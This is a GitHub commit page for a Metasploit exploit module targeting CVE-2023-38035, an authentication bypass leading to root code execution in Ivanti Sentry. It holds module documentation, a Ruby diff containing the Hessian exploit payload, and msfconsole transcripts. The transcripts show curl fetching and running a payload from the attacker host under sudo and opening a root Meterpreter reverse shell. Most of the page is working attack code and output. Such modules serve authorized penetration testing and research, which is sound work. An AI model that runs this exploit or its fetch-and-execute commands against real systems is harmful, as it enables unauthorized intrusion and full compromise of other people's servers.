Skip to content

Commit

Permalink
Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-3…
Browse files Browse the repository at this point in the history 
…8035)
  • Loading branch information
@jheysel-r7
jheysel-r7 committed Aug 29, 2023
1 parent b326832 commit a3a7454
Show file tree
Hide file tree
Showing 2 changed files with 192 additions and 10 deletions.
182 changes: 182 additions & 0 deletions documentation/modules/exploit/linux/http/ivanti_sentry_misc_log_service.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,182 @@
## Vulnerable Application
Ivanti Sentry (formerly Mobileiron Sentry) is vulnerable to an authentication by-pass which exposes API functionality which
allows for code execution in the context of the root user. The vulnerable endpoint `/mics/services/MICSLogService` exposes
a binary web service protocol 'Hessian' which allows remote users to invoke functions within the target. One of the functions
accessible via Hessian and the vulnerable endpoint is `uploadFileUsingFileInput` which accepts a `command` argument
that gets directly fed into a `Runtime.getRuntime().exec(cmd)` call. The command is run in the context of the `tomcat`
user however by default `tomcat` is in the sudoers file and thus we can use this to execute the payload in the context
of the `root` user.


## Verification Steps
1. Start `msfconsole`
1. Do: `use exploit/linux/http/ivanti_sentry_misc_service`
1. Do: `set RHOST [IP]`
1. Do: `set FETCH_SRVHOST [IP]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`


### Installation
A vulnerable instance of the software can be downloaded with the following
[link](https://mobileironsentry.blob.core.windows.net/mobileironsentrycontainer/sentry-mobileiron-9.12.0-16.vhd)
(note the .vhd file is ~34 GB). Once downloaded, import the file into your favorite hypervisor to run the software.
VMware Fusion 12 with the Sentry VM configured with a bridged network adapter worked out of the box for testing the module.

## Options

### SLEEP
Because the execution context does not allow for command piping or chaining we need to split the multi command payload
by semi-colon and send each command individually. This delay specifies how long to wait for each command to run.

### USE_SUDO
The command is executed in the context of the `tomcat` user. By default the `tomcat` user has the ability to execute
commands with `sudo`. In the event Sentry is installed on an OS that doesn't have the `sudo` binary, this has been left
has a configurable option in case it needs to be disabled.

## Scenarios

### MobileIron Sentry 9.12.0-16 (Unix In Memory)
```
msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > options
Module options (exploit/linux/http/ivanti_sentry_misc_log_service):
Name Current Setting Required Description
---- --------------- -------- -----------
SLEEP 3 yes How long to wait for each command to run. Because the execu
tion context does not allow for command piping or chaining
we need to split the multi command payload by semi-colon an
d send each command individually
Proxies no A proxy chain of format type:host:port[,type:host:port][...
]
RHOSTS 192.168.1.78 yes The target host(s), see https://docs.metasploit.com/docs/us
ing-metasploit/basics/using-metasploit.html
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly gener
ated)
URIPATH no The URI to use for this exploit (default is random)
USE_SUDO true yes Execute payload as root using sudo
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, T
NFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME QldLjjMRU no Name to use on remote system when storing payload; can
not contain spaces.
FETCH_SRVHOST 192.168.1.72 no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain s
paces.
LHOST 192.168.1.72 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > rexploit
[*] Reloading module...
[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
```

### MobileIron Sentry 9.12.0-19 (Linux Dropper)

```
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set target 1
target => 1
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > run
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.72:8080/vgrmjQ1
[*] Generated command stager: ["curl -so /tmp/NCAcpzqb http://192.168.1.72:8080/vgrmjQ1;chmod +x /tmp/NCAcpzqb;/tmp/NCAcpzqb;rm -f /tmp/NCAcpzqb"]
[*] Running the command: sudo curl -so /tmp/NCAcpzqb http://192.168.1.72:8080/vgrmjQ1
[*] Client 192.168.1.78 (curl/7.29.0) requested /vgrmjQ1
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo chmod +x /tmp/NCAcpzqb
[*] Running the command: sudo /tmp/NCAcpzqb
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 7 opened (192.168.1.72:4443 -> 192.168.1.78:40572) at 2023-08-29 14:28:22 -0400
[*] Running the command: sudo rm -f /tmp/NCAcpzqb
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```


20 changes: 10 additions & 10 deletions modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,13 +14,13 @@ def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ivanti Sentry Misc Log Service',
'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',
'Description' => %q{
This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which
allows for code execution in the context of the root user.
},
'Author' => [
'Zach Hanley', # Discovery & PoC
'Zach Hanley', # Discovery & PoC
'James Horseman', # Discovery & PoC
'jheysel-r7' # Msf module
],
Expand All @@ -40,7 +40,7 @@ def initialize(info = {})
'Arch' => [ ARCH_CMD, ARCH_X64 ],
'Targets' => [
[
'Unix Command',
'Unix (In-Memory)',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
Expand All @@ -57,7 +57,7 @@ def initialize(info = {})
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :wget,
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
Expand All @@ -76,7 +76,7 @@ def initialize(info = {})
register_options(
[
OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),
OptInt.new('COMMAND_DELAY', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining we need to split up the multiple commands and wait for each one to complete', 3 ]),
OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),
]
)
end
Expand All @@ -96,19 +96,19 @@ def check
end

def execute_command(cmd, _opts = {})
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

# Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`
# which allows unauthenticated command execution in the context of the root user.
# which allows for unauthenticated command execution in the context of the root user.
# More information on Hessian can be found: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers

exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"
exploit_footer = "S\x00\x06isRootTzNz"

cmds = cmd.split(';')
cmds.each do |c|
c = "sudo #{c}" if datastore['USE_SUDO']
vprint_status('Running the command: ' + c)

# Prepend the command with the length of the command as per Hessian notation
data = exploit_header + [c.length].pack('C') + c + exploit_footer
res = send_request_raw(
'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),
Expand All @@ -119,8 +119,8 @@ def execute_command(cmd, _opts = {})
fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res
fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')

# Because we split the payload up by semi-colons, don't run all the commands immediately after one another. Ensure the reverse shell has time to finish downloading before the module attempts to run it.
sleep(datastore['COMMAND_DELAY'])
# Because we split the payload up by semi-colons, we don't want all the commands run immediately after one another. Ensure the reverse shell has time to finish downloading before the module attempts to run it.
sleep(datastore['SLEEP'])
end
end

Expand Down

0 comments on commit a3a7454

Please sign in to comment.